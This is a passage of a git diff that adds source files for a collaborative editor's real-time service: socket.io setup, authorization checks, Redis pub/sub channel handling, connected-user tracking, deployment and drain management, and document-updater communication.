sessionSecrets = [ + Settings.security.sessionSecret, + Settings.security.sessionSecretUpcoming, + Settings.security.sessionSecretFallback, +].filter(Boolean) +const cookieParser = CookieParser(sessionSecrets) + +const sessionSockets = new SessionSockets( + io, + sessionStore, + cookieParser, + Settings.cookieName +) + +Metrics.injectMetricsRoute(app) + +io.configure(function () { + // Don't use socket.io to serve client + io.disable('browser client') + + // Fix for Safari 5 error of "Error during WebSocket handshake: location mismatch" + // See http://answers.dotcloud.com/question/578/problem-with-websocket-over-ssl-in-safari-with + io.set('match origin protocol', true) + + io.set('transports', ['websocket', 'xhr-polling']) + + if (Settings.allowedCorsOrigins) { + // Create a regex for matching origins, allowing wildcard subdomains + const allowedCorsOriginsRegex = new RegExp( + `^${Settings.allowedCorsOrigins.replaceAll('.', '\\.').replace('://*', '://[^.]+')}(?::443)?$` + ) + + io.set('origins', function (origin, req) { + const normalizedOrigin = URL.parse(origin).origin + const originIsValid = allowedCorsOriginsRegex.test(normalizedOrigin) + + if (req.headers.origin) { + if (!originIsValid) { + logger.warn( + { normalizedOrigin, origin, req }, + 'Origin header does not match allowed origins' + ) + } + return originIsValid + } + + if (!originIsValid) { + // There is no Origin header and the Referrer does not satisfy the + // constraints. We're going to pass this anyway for now but log it + logger.warn( + { req, referer: req.headers.referer }, + 'Referrer header does not match allowed origins' + ) + } + + return true + }) + } +}) + +// Serve socket.io.js client file from imported dist folder +// The express sendFile method correctly handles conditional +// requests using the last-modified time and etag (which is +// a combination of mtime and size) +const socketIOClientFolder = require('socket.io-client').dist +app.get('/socket.io/socket.io.js', function (req, res) { + res.sendFile(Path.join(socketIOClientFolder, 'socket.io.min.js')) +}) + +// a 200 response on '/' is required for load balancer health checks +// these operate separately from kubernetes readiness checks +app.get('/', function (req, res) { + if (Settings.shutDownInProgress || DeploymentManager.deploymentIsClosed()) { + res.sendStatus(503) // Service unavailable + } else { + res.send('real-time is open') + } +}) + +app.get('/status', function (req, res) { + if (Settings.shutDownInProgress) { + res.sendStatus(503) // Service unavailable + } else { + res.send('real-time is alive') + } +}) + +app.get('/debug/events', function (req, res) { + Settings.debugEvents = parseInt(req.query.count, 10) || 20 + logger.info({ count: Settings.debugEvents }, 'starting debug mode') + res.send(`debug mode will log next ${Settings.debugEvents} events`) +}) + +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.realtime +) + +function healthCheck(req, res) { + rclient.healthCheck(function (error) { + if (error) { + logger.err({ err: error }, 'failed redis health check') + res.sendStatus(500) + } else if (HealthCheckManager.isFailing()) { + const status = HealthCheckManager.status() + logger.err({ pubSubErrors: status }, 'failed pubsub health check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} +app.get( + '/health_check', + (req, res, next) => { + if (Settings.shutDownComplete) { + return res.sendStatus(503) + } + next() + }, + healthCheck +) + +app.get('/health_check/redis', healthCheck) + +// log http requests for routes defined from this point onwards +app.use(Metrics.http.monitor(logger)) + +const Router = require('./app/js/Router') +Router.configure(app, io, sessionSockets) + +const WebsocketLoadBalancer = require('./app/js/WebsocketLoadBalancer') +WebsocketLoadBalancer.listenForEditorEvents(io) + +const DocumentUpdaterController = require('./app/js/DocumentUpdaterController') +DocumentUpdaterController.listenForUpdatesFromDocumentUpdater(io) + +const { port } = Settings.internal.realTime +const { host } = Settings.internal.realTime + +server.listen(port, host, function (error) { + if (error) { + throw error + } + logger.info(`realtime starting up, listening on ${host}:${port}`) +}) + +// Stop huge stack traces in logs from all the socket.io parsing steps. +Error.stackTraceLimit = 10 + +function shutdownAfterAllClientsHaveDisconnected() { + const connectedClients = io.sockets.clients().length + if (connectedClients === 0) { + logger.info({}, 'no clients connected, exiting') + process.exit() + } else { + logger.info( + { connectedClients }, + 'clients still connected, not shutting down yet' + ) + setTimeout(() => shutdownAfterAllClientsHaveDisconnected(), 5_000) + } +} + +function drainAndShutdown(signal) { + if (Settings.shutDownInProgress) { + logger.info({ signal }, 'shutdown already in progress, ignoring signal') + } else { + Settings.shutDownInProgress = true + const { statusCheckInterval } = Settings + if (statusCheckInterval) { + logger.info( + { signal }, + `received interrupt, delay drain by ${statusCheckInterval}ms` + ) + } + setTimeout(function () { + logger.info( + { signal }, + `received interrupt, starting drain over ${shutdownDrainTimeWindow} mins` + ) + DrainManager.startDrainTimeWindow(io, shutdownDrainTimeWindow, () => { + shutdownAfterAllClientsHaveDisconnected() + setTimeout(() => { + const staleClients = io.sockets.clients() + if (staleClients.length !== 0) { + logger.info( + { staleClients: staleClients.map(client => client.id) }, + 'forcefully disconnecting stale clients' + ) + staleClients.forEach(client => { + client.disconnect() + }) + } + // Mark the node as unhealthy. + Settings.shutDownComplete = true + }, Settings.gracefulReconnectTimeoutMs) + }) + }, statusCheckInterval) + } +} + +Settings.shutDownInProgress = false +const shutdownDrainTimeWindow = parseInt(Settings.shutdownDrainTimeWindow, 10) +if (Settings.shutdownDrainTimeWindow) { + logger.info({ shutdownDrainTimeWindow }, 'shutdownDrainTimeWindow enabled') + for (const signal of [ + 'SIGINT', + 'SIGHUP', + 'SIGQUIT', + 'SIGUSR1', + 'SIGUSR2', + 'SIGTERM', + 'SIGABRT', + ]) { + process.on(signal, drainAndShutdown) + } // signal is passed as argument to event handler + + // global exception handler + if (Settings.errors && Settings.errors.catchUncaughtErrors) { + process.removeAllListeners('uncaughtException') + process.on('uncaughtException', function (error) { + if ( + [ + 'ETIMEDOUT', + 'EHOSTUNREACH', + 'EPIPE', + 'ECONNRESET', + 'ERR_STREAM_WRITE_AFTER_END', + ].includes(error.code) || + // socket.io error handler sending on polling connection again. + (error.code === 'ERR_HTTP_HEADERS_SENT' && + error.stack && + error.stack.includes('Transport.error')) + ) { + Metrics.inc('disconnected_write', 1, { status: error.code }) + return logger.warn( + { err: error }, + 'attempted to write to disconnected client' + ) + } + logger.error({ err: error }, 'uncaught exception') + if (Settings.errors && Settings.errors.shutdownOnUncaughtError) { + drainAndShutdown('SIGABRT') + } + }) + } +} + +if (Settings.continualPubsubTraffic) { + logger.debug('continualPubsubTraffic enabled') + + const pubsubClient = redis.createClient(Settings.redis.pubsub) + const clusterClient = redis.createClient(Settings.redis.websessions) + + const publishJob = function (channel, callback) { + const checker = new HealthCheckManager(channel) + logger.debug({ channel }, 'sending pub to keep connection alive') + const json = JSON.stringify({ + health_check: true, + key: checker.id, + date: new Date().toString(), + }) + Metrics.summary(`redis.publish.${channel}`, json.length) + pubsubClient.publish(channel, json, function (err) { + if (err) { + logger.err({ err, channel }, 'error publishing pubsub traffic to redis') + } + const blob = JSON.stringify({ keep: 'alive' }) + Metrics.summary('redis.publish.cluster-continual-traffic', blob.length) + clusterClient.publish('cluster-continual-traffic', blob, callback) + }) + } + + const runPubSubTraffic = () => + async.map(['applied-ops', 'editor-events'], publishJob, () => + setTimeout(runPubSubTraffic, 1000 * 20) + ) + + runPubSubTraffic() +} diff --git a/services/real-time/app/js/AuthorizationManager.js b/services/real-time/app/js/AuthorizationManager.js new file mode 100644 index 0000000..b8633ad --- /dev/null +++ b/services/real-time/app/js/AuthorizationManager.js @@ -0,0 +1,81 @@ +const { NotAuthorizedError } = require('./Errors') + +let AuthorizationManager +module.exports = AuthorizationManager = { + assertClientCanViewProject(client, callback) { + AuthorizationManager._assertClientHasPrivilegeLevel( + client, + ['readOnly', 'readAndWrite', 'review', 'owner'], + callback + ) + }, + + assertClientCanEditProject(client, callback) { + AuthorizationManager._assertClientHasPrivilegeLevel( + client, + ['readAndWrite', 'owner'], + callback + ) + }, + + assertClientCanReviewProject(client, callback) { + AuthorizationManager._assertClientHasPrivilegeLevel( + client, + ['readAndWrite', 'owner', 'review'], + callback + ) + }, + + _assertClientHasPrivilegeLevel(client, allowedLevels, callback) { + if (allowedLevels.includes(client.ol_context.privilege_level)) { + callback(null) + } else { + callback(new NotAuthorizedError()) + } + }, + + assertClientCanViewProjectAndDoc(client, docId, callback) { + AuthorizationManager.assertClientCanViewProject(client, function (error) { + if (error) { + return callback(error) + } + AuthorizationManager._assertClientCanAccessDoc(client, docId, callback) + }) + }, + + assertClientCanEditProjectAndDoc(client, docId, callback) { + AuthorizationManager.assertClientCanEditProject(client, function (error) { + if (error) { + return callback(error) + } + AuthorizationManager._assertClientCanAccessDoc(client, docId, callback) + }) + }, + + assertClientCanReviewProjectAndDoc(client, docId, callback) { + AuthorizationManager.assertClientCanReviewProject(client, function (error) { + if (error) { + return callback(error) + } + AuthorizationManager._assertClientCanAccessDoc(client, docId, callback) + }) + }, + + _assertClientCanAccessDoc(client, docId, callback) { + if (client.ol_context[`doc:${docId}`] === 'allowed') { + callback(null) + } else { + callback(new NotAuthorizedError()) + } + }, + + addAccessToDoc(client, docId, callback) { + client.ol_context[`doc:${docId}`] = 'allowed' + callback(null) + }, + + removeAccessToDoc(client, docId, callback) { + delete client.ol_context[`doc:${docId}`] + callback(null) + }, +} diff --git a/services/real-time/app/js/ChannelManager.js b/services/real-time/app/js/ChannelManager.js new file mode 100644 index 0000000..42b6172 --- /dev/null +++ b/services/real-time/app/js/ChannelManager.js @@ -0,0 +1,101 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') + +const ClientMap = new Map() // for each redis client, store a Map of subscribed channels (channelname -> subscribe promise) + +// Manage redis pubsub subscriptions for individual projects and docs, ensuring +// that we never subscribe to a channel multiple times. The socket.io side is +// handled by RoomManager. + +module.exports = { + getClientMapEntry(rclient) { + // return the per-client channel map if it exists, otherwise create and + // return an empty map for the client. + return ( + ClientMap.get(rclient) || ClientMap.set(rclient, new Map()).get(rclient) + ) + }, + + subscribe(rclient, baseChannel, id) { + const clientChannelMap = this.getClientMapEntry(rclient) + const channel = `${baseChannel}:${id}` + const actualSubscribe = function () { + // subscribe is happening in the foreground and it should reject + return rclient + .subscribe(channel) + .finally(function () { + if (clientChannelMap.get(channel) === subscribePromise) { + clientChannelMap.delete(channel) + } + }) + .then(function () { + logger.debug({ channel }, 'subscribed to channel') + metrics.inc(`subscribe.${baseChannel}`) + }) + .catch(function (err) { + logger.error({ channel, err }, 'failed to subscribe to channel') + metrics.inc(`subscribe.failed.${baseChannel}`) + // add context for the stack-trace at the call-site + throw new OError('failed to subscribe to channel', { + channel, + }).withCause(err) + }) + } + + const pendingActions = clientChannelMap.get(channel) || Promise.resolve() + const subscribePromise = pendingActions.then( + actualSubscribe, + actualSubscribe + ) + clientChannelMap.set(channel, subscribePromise) + logger.debug({ channel }, 'planned to subscribe to channel') + return subscribePromise + }, + + unsubscribe(rclient, baseChannel, id) { + const clientChannelMap = this.getClientMapEntry(rclient) + const channel = `${baseChannel}:${id}` + const actualUnsubscribe = function () { + // unsubscribe is happening in the background, it should not reject + return rclient + .unsubscribe(channel) + .finally(function () { + if (clientChannelMap.get(channel) === unsubscribePromise) { + clientChannelMap.delete(channel) + } + }) + .then(function () { + logger.debug({ channel }, 'unsubscribed from channel') + metrics.inc(`unsubscribe.${baseChannel}`) + }) + .catch(function (err) { + logger.error({ channel, err }, 'unsubscribed from channel') + metrics.inc(`unsubscribe.failed.${baseChannel}`) + }) + } + + const pendingActions = clientChannelMap.get(channel) || Promise.resolve() + const unsubscribePromise = pendingActions.then( + actualUnsubscribe, + actualUnsubscribe + ) + clientChannelMap.set(channel, unsubscribePromise) + logger.debug({ channel }, 'planned to unsubscribe from channel') + return unsubscribePromise + }, + + publish(rclient, baseChannel, id, data) { + let channel + metrics.summary(`redis.publish.${baseChannel}`, data.length) + if (id === 'all' || !settings.publishOnIndividualChannels) { + channel = baseChannel + } else { + channel = `${baseChannel}:${id}` + } + // we publish on a different client to the subscribe, so we can't + // check for the channel existing here + rclient.publish(channel, data) + }, +} diff --git a/services/real-time/app/js/ConnectedUsersManager.js b/services/real-time/app/js/ConnectedUsersManager.js new file mode 100644 index 0000000..1421e8e --- /dev/null +++ b/services/real-time/app/js/ConnectedUsersManager.js @@ -0,0 +1,249 @@ +const async = require('async') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const redis = require('@overleaf/redis-wrapper') +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const rclient = redis.createClient(Settings.redis.realtime) +const Keys = Settings.redis.realtime.key_schema + +const ONE_HOUR_IN_S = 60 * 60 +const ONE_DAY_IN_S = ONE_HOUR_IN_S * 24 +const FOUR_DAYS_IN_S = ONE_DAY_IN_S * 4 + +const USER_TIMEOUT_IN_S = ONE_HOUR_IN_S / 4 +const REFRESH_TIMEOUT_IN_S = 10 // only show clients which have responded to a refresh request in the last 10 seconds + +function recordProjectNotEmptySinceMetric(res, status) { + const diff = Date.now() / 1000 - parseInt(res, 10) + const BUCKETS = [ + 0, + ONE_HOUR_IN_S, + 2 * ONE_HOUR_IN_S, + ONE_DAY_IN_S, + 2 * ONE_DAY_IN_S, + 7 * ONE_DAY_IN_S, + 30 * ONE_DAY_IN_S, + ] + Metrics.histogram('project_not_empty_since', diff, BUCKETS, { status }) +} + +module.exports = { + // Use the same method for when a user connects, and when a user sends a cursor + // update. This way we don't care if the connected_user key has expired when + // we receive a cursor update. + updateUserPosition(projectId, clientId, user, cursorData, callback) { + logger.debug({ projectId, clientId }, 'marking user as joined or connected') + + const multi = rclient.multi() + + multi.sadd(Keys.clientsInProject({ project_id: projectId }), clientId) + multi.scard(Keys.clientsInProject({ project_id: projectId })) + multi.expire( + Keys.clientsInProject({ project_id: projectId }), + FOUR_DAYS_IN_S + ) + + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'last_updated_at', + Date.now() + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'user_id', + user._id + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'first_name', + user.first_name || '' + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'last_name', + user.last_name || '' + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'email', + user.email || '' + ) + + if (cursorData) { + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'cursorData', + JSON.stringify(cursorData) + ) + } + multi.expire( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + USER_TIMEOUT_IN_S + ) + + multi.exec(function (err, res) { + if (err) { + err = new OError('problem marking user as connected').withCause(err) + } + const [, nConnectedClients] = res + Metrics.inc('editing_session_mode', 1, { + method: cursorData ? 'update' : 'connect', + status: nConnectedClients === 1 ? 'single' : 'multi', + }) + callback(err) + }) + }, + + refreshClient(projectId, clientId) { + logger.debug({ projectId, clientId }, 'refreshing connected client') + const multi = rclient.multi() + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'last_updated_at', + Date.now() + ) + multi.expire( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + USER_TIMEOUT_IN_S + ) + multi.exec(function (err) { + if (err) { + logger.err( + { err, projectId, clientId }, + 'problem refreshing connected client' + ) + } + }) + }, + + markUserAsDisconnected(projectId, clientId, callback) { + logger.debug({ projectId, clientId }, 'marking user as disconnected') + const multi = rclient.multi() + multi.srem(Keys.clientsInProject({ project_id: projectId }), clientId) + multi.scard(Keys.clientsInProject({ project_id: projectId })) + multi.expire( + Keys.clientsInProject({ project_id: projectId }), + FOUR_DAYS_IN_S + ) + multi.del( + Keys.connectedUser({ project_id: projectId, client_id: clientId }) + ) + multi.exec(function (err, res) { + if (err) { + err = new OError('problem marking user as disconnected').withCause(err) + } + const [, nConnectedClients] = res + const status = + nConnectedClients === 0 + ? 'empty' + : nConnectedClients === 1 + ? 'single' + : 'multi' + Metrics.inc('editing_session_mode', 1, { + method: 'disconnect', + status, + }) + if (status === 'empty') { + rclient.getdel(Keys.projectNotEmptySince({ projectId }), (err, res) => { + if (err) { + logger.warn( + { err, projectId }, + 'could not collect projectNotEmptySince' + ) + } else if (res) { + recordProjectNotEmptySinceMetric(res, status) + } + }) + } else { + // Only populate projectNotEmptySince when more clients remain connected. + const nowInSeconds = Math.ceil(Date.now() / 1000).toString() + // We can go back to SET GET after upgrading to redis 7.0+ + const multi = rclient.multi() + multi.get(Keys.projectNotEmptySince({ projectId })) + multi.set( + Keys.projectNotEmptySince({ projectId }), + nowInSeconds, + 'NX', + 'EX', + 31 * ONE_DAY_IN_S + ) + multi.exec((err, res) => { + if (err) { + logger.warn( + { err, projectId }, + 'could not get/set projectNotEmptySince' + ) + } else if (res[0]) { + recordProjectNotEmptySinceMetric(res[0], status) + } + }) + } + callback(err) + }) + }, + + _getConnectedUser(projectId, clientId, callback) { + rclient.hgetall( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + function (err, result) { + if (err) { + err = new OError('problem fetching connected user details', { + other_client_id: clientId, + }).withCause(err) + return callback(err) + } + if (!(result && result.user_id)) { + result = { + connected: false, + client_id: clientId, + } + } else { + result.connected = true + result.client_id = clientId + result.client_age = + (Date.now() - parseInt(result.last_updated_at, 10)) / 1000 + if (result.cursorData) { + try { + result.cursorData = JSON.parse(result.cursorData) + } catch (e) { + OError.tag(e, 'error parsing cursorData JSON', { + other_client_id: clientId, + cursorData: result.cursorData, + }) + return callback(e) + } + } + } + callback(err, result) + } + ) + }, + + getConnectedUsers(projectId, callback) { + const self = this + rclient.smembers( + Keys.clientsInProject({ project_id: projectId }), + function (err, results) { + if (err) { + err = new OError('problem getting clients in project').withCause(err) + return callback(err) + } + const jobs = results.map( + clientId => cb => self._getConnectedUser(projectId, clientId, cb) + ) + async.series(jobs, function (err, users) { + if (err) { + OError.tag(err, 'problem getting connected users') + return callback(err) + } + users = users.filter( + user => + user && user.connected && user.client_age < REFRESH_TIMEOUT_IN_S + ) + callback(null, users) + }) + } + ) + }, +} diff --git a/services/real-time/app/js/DeploymentManager.js b/services/real-time/app/js/DeploymentManager.js new file mode 100644 index 0000000..58c1618 --- /dev/null +++ b/services/real-time/app/js/DeploymentManager.js @@ -0,0 +1,62 @@ +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const fs = require('node:fs') + +// Monitor a status file (e.g. /etc/real_time_status) periodically and close the +// service if the file contents don't contain the matching deployment colour. + +const FILE_CHECK_INTERVAL = 5000 +const statusFile = settings.deploymentFile +const deploymentColour = settings.deploymentColour + +let serviceCloseTime + +function updateDeploymentStatus(fileContent) { + const closed = fileContent && !fileContent.includes(deploymentColour) + if (closed && !settings.serviceIsClosed) { + settings.serviceIsClosed = true + serviceCloseTime = Date.now() + 60 * 1000 // delay closing by 1 minute + logger.info({ fileContent }, 'closing service') + } else if (!closed && settings.serviceIsClosed) { + settings.serviceIsClosed = false + logger.info({ fileContent }, 'opening service') + } +} + +function pollStatusFile() { + fs.readFile(statusFile, { encoding: 'utf8' }, (err, fileContent) => { + if (err) { + logger.error( + { file: statusFile, fsErr: err }, + 'error reading service status file' + ) + return + } + updateDeploymentStatus(fileContent) + }) +} + +function checkStatusFileSync() { + // crash on start up if file does not exist + const content = fs.readFileSync(statusFile, { encoding: 'utf8' }) + updateDeploymentStatus(content) + if (settings.serviceIsClosed) { + serviceCloseTime = Date.now() // skip closing delay on start up + } +} + +module.exports = { + initialise() { + if (statusFile && deploymentColour) { + logger.info( + { statusFile, deploymentColour, interval: FILE_CHECK_INTERVAL }, + 'monitoring deployment status file' + ) + checkStatusFileSync() // perform an initial synchronous check at start up + setInterval(pollStatusFile, FILE_CHECK_INTERVAL) // continue checking periodically + } + }, + deploymentIsClosed() { + return settings.serviceIsClosed && Date.now() >= serviceCloseTime + }, +} diff --git a/services/real-time/app/js/DocumentUpdaterController.js b/services/real-time/app/js/DocumentUpdaterController.js new file mode 100644 index 0000000..3fd22d3 --- /dev/null +++ b/services/real-time/app/js/DocumentUpdaterController.js @@ -0,0 +1,184 @@ +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const RedisClientManager = require('./RedisClientManager') +const SafeJsonParse = require('./SafeJsonParse') +const EventLogger = require('./EventLogger') +const HealthCheckManager = require('./HealthCheckManager') +const RoomManager = require('./RoomManager') +const ChannelManager = require('./ChannelManager') +const metrics = require('@overleaf/metrics') + +let DocumentUpdaterController +module.exports = DocumentUpdaterController = { + // DocumentUpdaterController is responsible for updates that come via Redis + // Pub/Sub from the document updater. + rclientList: RedisClientManager.createClientList(settings.redis.pubsub), + + listenForUpdatesFromDocumentUpdater(io) { + logger.debug( + { rclients: this.rclientList.length }, + 'listening for applied-ops events' + ) + for (const rclient of this.rclientList) { + rclient.subscribe('applied-ops') + rclient.on('message', function (channel, message) { + metrics.inc('rclient', 0.001) // global event rate metric + if (settings.debugEvents > 0) { + EventLogger.debugEvent(channel, message) + } + DocumentUpdaterController._processMessageFromDocumentUpdater( + io, + channel, + message + ) + }) + } + // create metrics for each redis instance only when we have multiple redis clients + if (this.rclientList.length > 1) { + this.rclientList.forEach((rclient, i) => { + // per client event rate metric + const metricName = `rclient-${i}` + rclient.on('message', () => metrics.inc(metricName, 0.001)) + }) + } + this.handleRoomUpdates(this.rclientList) + }, + + handleRoomUpdates(rclientSubList) { + const roomEvents = RoomManager.eventSource() + roomEvents.on('doc-active', function (docId) { + const subscribePromises = rclientSubList.map(rclient => + ChannelManager.subscribe(rclient, 'applied-ops', docId) + ) + RoomManager.emitOnCompletion(subscribePromises, `doc-subscribed-${docId}`) + }) + roomEvents.on('doc-empty', docId => + rclientSubList.map(rclient => + ChannelManager.unsubscribe(rclient, 'applied-ops', docId) + ) + ) + }, + + _processMessageFromDocumentUpdater(io, channel, message) { + SafeJsonParse.parse(message, function (error, message) { + if (error) { + logger.error({ err: error, channel }, 'error parsing JSON') + return + } + if (message.op) { + if (message._id && settings.checkEventOrder) { + const status = EventLogger.checkEventOrder( + 'applied-ops', + message._id, + message + ) + if (status === 'duplicate') { + return // skip duplicate events + } + } + DocumentUpdaterController._applyUpdateFromDocumentUpdater( + io, + message.doc_id, + message.op + ) + } else if (message.error) { + DocumentUpdaterController._processErrorFromDocumentUpdater( + io, + message.doc_id, + message.error, + message + ) + } else if (message.health_check) { + logger.debug( + { message }, + 'got health check message in applied ops channel' + ) + HealthCheckManager.check(channel, message.key) + } + }) + }, + + _applyUpdateFromDocumentUpdater(io, docId, update) { + let client + const clientList = io.sockets.clients(docId) + // avoid unnecessary work if no clients are connected + if (clientList.length === 0) { + return + } + + update.meta = update.meta || {} + const { tsRT: realTimeIngestionTime } = update.meta + delete update.meta.tsRT + + // send updates to clients + logger.debug( + { + docId, + version: update.v, + source: update.meta && update.meta.source, + socketIoClients: clientList.map(client => client.id), + }, + 'distributing updates to clients' + ) + const seen = {} + // send messages only to unique clients (due to duplicate entries in io.sockets.clients) + for (client of clientList) { + if (!seen[client.id]) { + seen[client.id] = true + if (client.publicId === update.meta.source) { + logger.debug( + { + docId, + version: update.v, + source: update.meta.source, + }, + 'distributing update to sender' + ) + metrics.histogram( + 'update-processing-time', + performance.now() - realTimeIngestionTime, + [ + 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 50, 100, 200, 500, 1000, + 2000, 5000, 10000, + ], + { path: 'sharejs' } + ) + client.emit('otUpdateApplied', { v: update.v, doc: update.doc }) + } else if (!update.dup) { + // Duplicate ops should just be sent back to sending client for acknowledgement + logger.debug( + { + docId, + version: update.v, + source: update.meta.source, + clientId: client.id, + }, + 'distributing update to collaborator' + ) + client.emit('otUpdateApplied', update) + } + } + } + if (Object.keys(seen).length < clientList.length) { + metrics.inc('socket-io.duplicate-clients', 0.1) + logger.debug( + { + docId, + socketIoClients: clientList.map(client => client.id), + }, + 'discarded duplicate clients' + ) + } + }, + + _processErrorFromDocumentUpdater(io, docId, error, message) { + for (const client of io.sockets.clients(docId)) { + logger.warn( + { err: error, docId, clientId: client.id }, + 'error from document updater, disconnecting client' + ) + client.emit('otUpdateError', error, message) + client.disconnect() + } + }, +} diff --git a/services/real-time/app/js/DocumentUpdaterManager.js b/services/real-time/app/js/DocumentUpdaterManager.js new file mode 100644 index 0000000..0a9a12c --- /dev/null +++ b/services/real-time/app/js/DocumentUpdaterManager.js @@ -0,0 +1,156 @@ +const request = require('request') +const _ = require('lodash') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const metrics = require('@overleaf/metrics') +const { + ClientRequestedMissingOpsError, + DocumentUpdaterRequestFailedError, + NullBytesInOpError, + UpdateTooLargeError, +} = require('./Errors') + +const rclient = require('@overleaf/redis-wrapper').createClient( + settings.redis.documentupdater +) +const Keys = settings.redis.documentupdater.key_schema + +const DocumentUpdaterManager = { + getDocument(projectId, docId, fromVersion, callback) { + const timer = new metrics.Timer('get-document') + const url = `${settings.apis.documentupdater.url}/project/${projectId}/doc/${docId}?fromVersion=${fromVersion}` + logger.debug( + { projectId, docId, fromVersion }, + 'getting doc from document updater' + ) + request.get(url, function (err, res, body) { + timer.done() + if (err) { + OError.tag(err, 'error getting doc from doc updater') + return callback(err) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug( + { projectId, docId }, + 'got doc from document document updater' + ) + try { + body = JSON.parse(body) + } catch (error) { + OError.tag(error, 'error parsing doc updater response') + return callback(error) + } + body = body || {} + callback( + null, + body.lines, + body.version, + body.ranges, + body.ops, + body.ttlInS + ) + } else if (res.statusCode === 422 && body?.firstVersionInRedis) { + callback(new ClientRequestedMissingOpsError(422, body)) + } else if ([404, 422].includes(res.statusCode)) { + callback(new ClientRequestedMissingOpsError(res.statusCode)) + } else { + callback( + new DocumentUpdaterRequestFailedError('getDocument', res.statusCode) + ) + } + }) + }, + + checkDocument(projectId, docId, callback) { + // in this call fromVersion = -1 means get document without docOps + DocumentUpdaterManager.getDocument(projectId, docId, -1, callback) + }, + + flushProjectToMongoAndDelete(projectId, callback) { + // this method is called when the last connected user leaves the project + logger.debug({ projectId }, 'deleting project from document updater') + const timer = new metrics.Timer('delete.mongo.project') + // flush the project in the background when all users have left + const url = + `${settings.apis.documentupdater.url}/project/${projectId}?background=true` + + (settings.shutDownInProgress ? '&shutdown=true' : '') + request.del(url, function (err, res) { + timer.done() + if (err) { + OError.tag(err, 'error deleting project from document updater') + callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug({ projectId }, 'deleted project from document updater') + callback(null) + } else { + callback( + new DocumentUpdaterRequestFailedError( + 'flushProjectToMongoAndDelete', + res.statusCode + ) + ) + } + }) + }, + + _getPendingUpdateListKey() { + const shard = _.random(0, settings.pendingUpdateListShardCount - 1) + if (shard === 0) { + return 'pending-updates-list' + } else { + return `pending-updates-list-${shard}` + } + }, + + queueChange(projectId, docId, change, callback) { + const allowedKeys = [ + 'doc', + 'op', + 'v', + 'dupIfSource', + 'meta', + 'lastV', + 'hash', + ] + change = _.pick(change, allowedKeys) + const jsonChange = JSON.stringify(change) + if (jsonChange.indexOf('\u0000') !== -1) { + // memory corruption check + return callback(new NullBytesInOpError(jsonChange)) + } + + const updateSize = jsonChange.length + if (updateSize > settings.maxUpdateSize) { + return callback(new UpdateTooLargeError(updateSize)) + } + + // record metric for each update added to queue + metrics.summary('redis.pendingUpdates', updateSize, { status: 'push' }) + + const docKey = `${projectId}:${docId}` + // Push onto pendingUpdates for doc_id first, because once the doc updater + // gets an entry on pending-updates-list, it starts processing. + rclient.rpush( + Keys.pendingUpdates({ doc_id: docId }), + jsonChange, + function (error) { + if (error) { + error = new OError('error pushing update into redis').withCause(error) + return callback(error) + } + const queueKey = DocumentUpdaterManager._getPendingUpdateListKey() + rclient.rpush(queueKey, docKey, function (error) { + if (error) { + error = new OError('error pushing doc_id into redis') + .withInfo({ queueKey }) + .withCause(error) + } + callback(error) + }) + } + ) + }, +} + +module.exports = DocumentUpdaterManager diff --git a/services/real-time/app/js/DrainManager.js b/services/real-time/app/js/DrainManager.js new file mode 100644 index 0000000..c8fc72c --- /dev/null +++ b/services/real-time/app/js/DrainManager.js @@ -0,0 +1,59 @@ +const logger = require('@overleaf/logger') + +module.exports = { + startDrainTimeWindow(io, minsToDrain, callback) { + const drainPerMin = io.sockets.clients().length / minsToDrain + // enforce minimum drain rate + this.startDrain(io, Math.max(drainPerMin / 60, 4), callback) + }, + + startDrain(io, rate, callback) { + // Clear out any old interval + clearInterval(this.interval) + logger.info({ rate }, 'starting drain') + if (rate === 0) { + return + } + let pollingInterval + if (rate < 1) { + // allow lower drain rates + // e.g. rate=0.1 will drain one client every 10 seconds + pollingInterval = 1000 / rate + rate = 1 + } else { + pollingInterval = 1000 + } + this.interval = setInterval(() => { + const requestedAllClientsToReconnect = this.reconnectNClients(io, rate) + if (requestedAllClientsToReconnect && callback) { + callback() + callback = undefined + } + }, pollingInterval) + }, + + RECONNECTED_CLIENTS: {}, + reconnectNClients(io, N) { + let drainedCount = 0 + for (const client of io.sockets.clients()) { + if (!this.RECONNECTED_CLIENTS[client.id]) { + this.RECONNECTED_CLIENTS[client.id] = true + logger.debug( + { clientId: client.id }, + 'Asking client to reconnect gracefully' + ) + client.emit('reconnectGracefully') + drainedCount++ + } + const haveDrainedNClients = drainedCount === N + if (haveDrainedNClients) { + break + } + } + if (drainedCount < N) { + logger.info('All clients have been told to reconnectGracefully') + return true + } + return false + }, +} diff --git a/services/real-time/app/js/Errors.js b/services/real-time/app/js/Errors.js new file mode 100644 index 0000000..fea0cc6 --- /dev/null +++ b/services/real-time/app/js/Errors.js @@ -0,0 +1,104 @@ +const OError = require('@overleaf/o-error') + +class ClientRequestedMissingOpsError extends OError { + constructor(statusCode, info = {}) { + super('doc updater could not load requested ops', { + statusCode, + ...info, + }) + } +} + +class CodedError extends OError { + constructor(message, code) { + super(message, { code }) + } +} + +class CorruptedJoinProjectResponseError extends OError { + constructor() { + super('no data returned from joinProject request') + } +} + +class DataTooLargeToParseError extends OError { + constructor(data) { 